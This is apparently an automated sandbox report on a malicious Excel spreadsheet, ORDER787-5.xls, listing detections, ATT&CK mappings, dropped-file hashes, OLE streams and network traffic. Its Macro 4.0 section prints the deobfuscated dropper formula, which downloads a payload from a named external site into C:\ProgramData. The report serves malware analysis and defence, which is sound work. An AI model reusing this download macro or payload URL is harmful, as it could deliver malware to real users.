Analysis Report ORDER787-5.xls
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis |
Signature Overview |
---|
AV Detection: |
---|
Multi AV Scanner detection for dropped file |
Source: | ReversingLabs |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) |
Source: | File created |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded |
Document exploit detected (process start blacklist hit) |
Source: | Process created |
Source: | DNS query |
Source: | TCP traffic |
Networking: |
---|
Found malicious URLs in unpacked macro 4.0 sheet |
Source: | Macro 4.0 Deobfuscator |
Source: | JA3 fingerprint |
Source: | File created |
Source: | String found in binary or memory |
Source: | DNS traffic detected |
Source: | String found in binary or memory |
Source: | Network traffic detected |
System Summary: |
---|
Found malicious Excel 4.0 Macro |
Source: | Initial sample |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample |
Office process drops PE file |
Source: | File created |
Additional sources: |
---|
Source: | Memory allocated |
Source: | Code function |
Source: | OLE indicator, VBA macros |
Source: | Code function |
Source: | Binary or memory string |
Source: | Classification label |
Source: | File created |
Source: | OLE indicator, Workbook stream |
Source: | File read |
Source: | Key opened |
Source: | Process created |
Source: | Window detected |
Source: | Key opened |
Source: | File opened |
Source: | Initial sample |
Source: | Code function |
Source: | File created |
Source: | Process information set |
Source: | Stream path 'Workbook' entropy |
Source: | Dropped PE file which has not been started |
Source: | Code function |
Source: | Process created |
Source: | Code function |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting31 | Path Interception | Process Injection11 | Masquerading11 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery12 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution33 | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | File and Directory Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | System Information Discovery24 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting31 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information21 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll321 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
5% | Virustotal | Browse | ||
4% | ReversingLabs | Script.Trojan.Heuristic |
Dropped Files |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
15% | ReversingLabs | |||
15% | ReversingLabs |
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | TR/Crypt.XPACK.Gen | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
1% | Virustotal | Browse | ||
2% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
4% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
penrithdentalimplants.com.au | 160.153.76.195 | true | false | | unknown |
www.penrithdentalimplants.com.au | unknown | unknown | false | | unknown |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
160.153.76.195 | unknown | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 336129 |
Start date: | 05.01.2021 |
Start time: | 13:00:07 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 35s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | ORDER787-5.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal100.expl.evad.winXLS@7/13@1/1 |
EGA Information: | Failed |
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
13:00:52 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
AS-26496-GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | Get hash | malicious | Browse |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.1104823335779463 |
Encrypted: | false |
SSDEEP: | 6:kKekMSwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:lWkPlE99SNxAhUegeT2 |
MD5: | 88D01B15C32DC5F54651F0A97864E0EF |
SHA1: | 1396AB210AF8B93B30E8A46FBB83DAE780B84B11 |
SHA-256: | AD6121D0521AEAE4EFA83923B306C43A8EA2B74184AE0C898F6BACB4B8046702 |
SHA-512: | 0CEA566ADBCA3DE2C4AA21799DD19B9B755A7B355953144BDB20BFF927B81E897EB3A4EEFAAA7E57D94EB9D361BC45FADA0669EFA346FEFF4F8B0E248C0C5C8C |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 327680 |
Entropy (8bit): | 7.594344556420887 |
Encrypted: | false |
SSDEEP: | 6144:TkgbkwkCOtK/0C74zwkF1vjA77XR/RYvetp:T/bgCO8SzwkF1vUDXYvetp |
MD5: | 1A57412AB2EDD77103FD75768BA146DD |
SHA1: | 81599A9B526C16B2A0A82CADCB8ACAAC6781EC81 |
SHA-256: | 7AB75BC888C6DD0457098D4539D9C86C3F1358A3B0C1A262F2BB8287E2BAC917 |
SHA-512: | 7679B32035D95E5563EAD9D54D8EF810C20913DA702D983A23C66FC51E9F00647556BEE2BA48803BD13B1340744C78AAEA835BB9C247E616480595043DE9566A |
Malicious: | true |
Antivirus: |
|
Reputation: | low |
IE Cache URL: | https://www.penrithdentalimplants.com.au/ls/apperolew.png |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.131067658554214 |
Encrypted: | false |
SSDEEP: | 24:YW7VoaaP0yGLCfVxwj4LoFjh0JtxlggL0lue:NPazfVxwji5Ax |
MD5: | A4CD320321FB7CB36DCDBE18372DB7F6 |
SHA1: | 2214C8B629049D3FCAA14F59636C884A4A2AC765 |
SHA-256: | 382EFF7970B1157CA3CC1DE889E7BBC92BA06E2E9992FFB1E515C27C5B914EC2 |
SHA-512: | 395C094254E8B9E076527D452AC039397F5ACAB0171DBA7338F4571D33771124585FDDDBB35AEDDDB0A022BC9626DBFF761850E41AEBFE0CC25CBD0CE308CA6A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2128 |
Entropy (8bit): | 2.077588804474407 |
Encrypted: | false |
SSDEEP: | 24:Ywl/V3uaP0z4GmXIfzCsf3dte3YLaFnuOlehywoy/://QaRYfGi3do3l8 |
MD5: | D2F8C79A51EC1F551B9233C6FD1083EA |
SHA1: | 73FB2CA087FB85B595A981D499ACB31C156BB71C |
SHA-256: | 5C748A589C0EEA58A5664F62DD15E3B06CC436A8E5A30918F881793A8743379B |
SHA-512: | 341687BE2080E7BA0E6D778A4C013D1742745D294D94FAED19626BF4C050048D0C0D47D838D1F7092985D3873D63CC8B78A74F6569F8D299DF82159E79581E19 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206848634864182 |
Encrypted: | false |
SSDEEP: | 1536:cGILEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cdNNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | 93F2225BF5FFD6C4E480793CA89F0CBB |
SHA1: | 901730BE002933D11806C6417D1B35C794AFB953 |
SHA-256: | 968744AFB8FBEE61678CD949E38D7B4AC80073A40A90CC1E865C56621F0A925D |
SHA-512: | F01FAEBCEDD8D7C3B4C8404387A3BEF66E95853ECDCCFDE641261A32CC12C22C81D810E3E2FB161099756F64462C3B9DBC35733C55C9A3D84E5C81FBDBC35EBD |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 148333 |
Entropy (8bit): | 7.862613200850918 |
Encrypted: | false |
SSDEEP: | 3072:/wW92ouB+ctexrUW/HlaLuZl4KKB/BtVhdoMOmLtlbTy:/ZxuZexI0lSh/BbhdoMOmK |
MD5: | F172F8A0B25CB105FD588B810003BE34 |
SHA1: | A8317748F41F50D28FCCCC7CA11C74DC524D67D2 |
SHA-256: | E011EC839076E4F99839C495FA3B3BD70246EBF39B593724DA51B1E314263A0D |
SHA-512: | 5E004E3F06C46A17F4904344AECB42E7C030D1166D31AF0D904730ED689FDECA1F87A00B808D01B9E4C901BD9C4CBD35713EE77576E493BB7950455C88045D66 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.496574117992861 |
Encrypted: | false |
SSDEEP: | 12:85QhenCLgXg/XAlCPCHaXtB8XzB/lzUX+WnicvbsW1bDtZ3YilMMEpxRljKHTdJU:85vU/XTd6jHUYe7Dv3qWrNru/ |
MD5: | F477EDF49DB8F29FA1F7E8563873054A |
SHA1: | C39AC7E0ACF6C289AD7EE4FDC23C4D2E3778C550 |
SHA-256: | 3232C9EC5CC69786EEB55B4CA42C340AB196433A6F9D10B69104223F03C9FE55 |
SHA-512: | 8A43D696AE55466F73669264D320BAD18A4AB8A0DB0BCDC2ED7F446BC377FCB664B9EB300293E7835CD48B0118F9EECF727E10F1271B7BD3525985AA040E4474 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4056 |
Entropy (8bit): | 4.528803921190274 |
Encrypted: | false |
SSDEEP: | 96:8TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQh2TW/XojFrsgKWQ/:8bjFwg7QEbjFwg7QEbjFwg7QEbjFwg7g |
MD5: | BE347C89A9A76E5DF8F2035AF09871FF |
SHA1: | A5D5164AB3B388822846783B1D4543BA19C788C5 |
SHA-256: | 9F0967ED9573F54FB9A4EFFF1208E6DC8DF58792191F759F7B4BDBD5A3ADC0FF |
SHA-512: | 8FF4F2D97F45401FF6F53E48B1A2C56099DC71BD38BB386E7DAE90B77C9DA33A96D3FDF0905FC1687DDA31A88B4C5DE15E73270992E1CD4F63324A7B8870AFC6 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 169 |
Entropy (8bit): | 4.42743505414388 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCyG3urYCmMkQurYCv:dj6kQZC3ZUkQZC3ZUkQZC3ZUkQZs |
MD5: | 4232FA4840865D1AC196D3F04B274801 |
SHA1: | BB30CFD9644E02C3A4766006AC5DDDD11684B15F |
SHA-256: | D10AC2C8001288BBB4AD0E1A10572DEC3E549158FDDC2042084613941D17ACD7 |
SHA-512: | 7ADAAF43B2E7CA5E4578B1E7F16F219CD331A50190036490FFEDA1B30E44F656D61C4848ABA6F5DD5EA365F63C346254872F6E54FD6D531394992A9954F69B18 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.881888506863549 |
TrID: |
|
File name: | ORDER787-5.xls |
File size: | 165376 |
MD5: | 1d97c6cb50c4107498e4f0e76f539f0c |
SHA1: | a4dc090837c76aed324bea19c9f62e2d47bb7bc8 |
SHA256: | 1b761a682092f8be6c7e9eef709be08a7105159a5e4ffb7722b0530fba308ba4 |
SHA512: | 08c580cbb19b3684f96ab82ec358ca42b796d52045c71d7f794f91d745b62f184d0b1c6842dd6577fb2a0b762bd236f1d1d593b3c592767788fda08739b025a3 |
SSDEEP: | 3072:6D/0mXgqPYJJv0Cl04gsDDNEnRL/WL018klfOPxHfoVsfMJETA24CLjmbzafPRj:6z/PE2hyDJEBW6plWPGi4ENmbza3 |
File Content Preview: | ........................>.......................................................c.............................................................................................................................................................................. |
File Icon |
---|
Icon Hash: | e4eea286a4b4bcb4 |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OLE | |
Number of OLE Files: | 1 |
OLE File "ORDER787-5.xls" |
---|
Indicators | |
---|---|
Has Summary Info: | True |
Application Name: | Microsoft Excel |
Encrypted Document: | True |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | True |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Code Page: | 1251 |
Author: | |
Last Saved By: | |
Create Time: | 2006-09-16 00:00:00 |
Last Saved Time: | 2021-01-04 17:53:11 |
Creating Application: | |
Security: | 1 |
Document Summary | |
---|---|
Document Code Page: | 1251 |
Thumbnail Scaling Desired: | False |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 983040 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 102 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 102 |
Entropy: | 4.1769286656 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M i c r o s o f t E x c e l 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . . |
Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 280 |
---|
General | |
---|---|
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 280 |
Entropy: | 3.26288952551 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d a t a 2 . . . . . D i g i t a l S e c u r e . . . . . d a t a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200 |
---|
General | |
---|---|
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 200 |
Entropy: | 3.27412475502 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . y w . . . . . . . . . . . . |
Stream Path: Ctls, File Type: data, Stream Size: 68 |
---|
General | |
---|---|
Stream Path: | Ctls |
File Type: | data |
Stream Size: | 68 |
Entropy: | 3.77907363839 |
Base64 Encoded: | False |
Data ASCII: | . . . B . . . . . . . . ` . . . . . . ` . . . . . . . . . . . ( . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 154550 |
---|
General | |
---|---|
Stream Path: | Workbook |
File Type: | Applesoft BASIC program data, first line number 16 |
Stream Size: | 154550 |
Entropy: | 7.98610242414 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . . 6 > c d } . @ { . . . < 9 . ` - . . . . " . < . * . . 6 2 \\ . . . . . [ . . . . P . ( . . . . . . . . . . . . . t . . . . . \\ . p . . . ! . . . . . . . . . . { . $ 8 . . . . . . . . . ) . . 4 . | v U . [ < . t . . m . . 8 . . 4 . . . . ) 8 . o . P . . . . . N > . . . . . f . . . . . . . . . . . > . . / . . . ( / . . _ . $ F o . . l . . . . . . j h . . B . . . . . a . . . . . . . . . = . . . . . . . S . . . . . . . . . . . . . W . . . . . . t |
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 387 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECT |
File Type: | ISO-8859 text, with CRLF line terminators |
Stream Size: | 387 |
Entropy: | 5.00967281416 |
Base64 Encoded: | True |
Data ASCII: | I D = " { C 4 7 7 9 5 8 8 - 7 8 B C - 4 0 2 C - 9 C 2 8 - 3 4 8 E A A E D 9 5 6 B } " . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 5 6 9 E 5 A 9 E 5 A 9 E 5 A 9 E 5 A " . . D P B = " 5 3 5 1 A 4 F A 5 7 F B 5 7 F B 5 7 " . . G C = " 0 5 0 7 F 2 4 C 1 6 F F 1 7 F F 1 7 0 0 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0 |
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
File Type: | data |
Stream Size: | 20 |
Entropy: | 3.04643934467 |
Base64 Encoded: | False |
Data ASCII: | . . . . 1 . . . 8 . A . B . 1 . . . . . |
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2767 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 2767 |
Entropy: | 3.97981669814 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . |
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 728 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
File Type: | data |
Stream Size: | 728 |
Entropy: | 6.37265666305 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ) 3 . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 d4 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 29 33 e3 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Stream Path: _VBA_PROJECT_CUR/VBA/Лист1, File Type: data, Stream Size: 1127 |
---|
General | |
---|---|
Stream Path: | _VBA_PROJECT_CUR/VBA/Лист1 |
File Type: | data |
Stream Size: | 1127 |
Entropy: | 3.56364076858 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . $ . . . . . . . 8 . . . . . . . . . . . . . . . H . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . L i s t B o x 1 , 2 , 0 , M S F o r m s , L i s t B o x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . |
Data Raw: | 01 16 01 00 00 14 01 00 00 18 03 00 00 f8 00 00 00 24 02 00 00 ff ff ff ff 38 03 00 00 8c 03 00 00 00 00 00 00 01 00 00 00 48 1c e9 9f 00 00 ff ff 63 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Macro 4.0 Code |
---|
CALL("URLMon", "URLDownloadToFileA", "JJCCJJ", 0, ="https://www.penrithdentalimplants.com.au/ls/apperolew.png", C:\ProgramData\activex.ocx, 0, 0)
"=""https://www.penrithdentalimplants.com.au/ls/apperolew.png"""
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 5, 2021 13:01:07.085342884 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.273987055 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.274081945 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.283557892 CET | 49167 | 443 | 192.168.2.22 | 160.153.76.195 |
Jan 5, 2021 13:01:07.471865892 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479675055 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
Jan 5, 2021 13:01:07.479729891 CET | 443 | 49167 | 160.153.76.195 | 192.168.2.22 |
